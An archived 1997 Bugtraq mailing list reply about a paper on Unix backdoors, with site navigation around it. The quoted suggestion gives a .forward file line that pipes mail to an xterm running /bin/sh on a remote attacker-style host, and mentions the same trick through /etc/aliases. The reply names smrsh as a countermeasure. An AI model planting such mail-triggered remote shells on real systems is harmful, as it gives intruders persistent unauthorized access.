Nmap Security Scanner
*Intro
*Ref Guide
*Install Guide
*Download
*Changelog
*Book
*Docs
Security Lists
*Nmap Hackers
*Nmap Dev
*Bugtraq
*Full Disclosure
*Pen Test
*Basics
*More
Security Tools
*Pass crackers
*Sniffers
*Vuln Scanners
*Web scanners
*Wireless
*Exploitation
*Packet crafters
*More
Site News
Site Search:
Exploit World
Advertising
About/Contact
Credits
Sponsors:

bugtraq logo Bugtraq mailing list archives

Re: Backdoor Paper
From: avalon () COOMBS ANU EDU AU (Darren Reed)
Date: Tue, 26 Aug 1997 10:31:36 +1000

In some mail from Evil Pete, sie said:



Here's a paper I wrote on backdoors.  Feedback welcome.


<snip>

you may want to add:


    .forward Backdoor

    On Unix machines, placing commands into the .forward file was also
    a common method of regaining access.  For the account ``username''
    a .forward file might be constructed as follows:

        \username
        |"/usr/local/X11/bin/xterm -disp hacksys.other.dom:0.0 -e /bin/sh"

    permutations of this method include alteration of the systems mail
    aliases file (most commonly located at /etc/aliases).  Note that
    this is a simple permutation, the more advanced  can run a simple
    script from the forward file that can take arbitrary commands via
    stdin (after minor preprocessing).


                -Pete

PS: The above method is also useful gaining access a companies
        mailhub (assuming there is a shared a home directory FS on
        the client and server).


Using smrsh can effectively negate this backdoor (although it's quite
possibly still a problem if you allow things like elm's filter or
procmail which can run programs themselves...).

Darren

  By Date           By Thread  

Current thread:
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]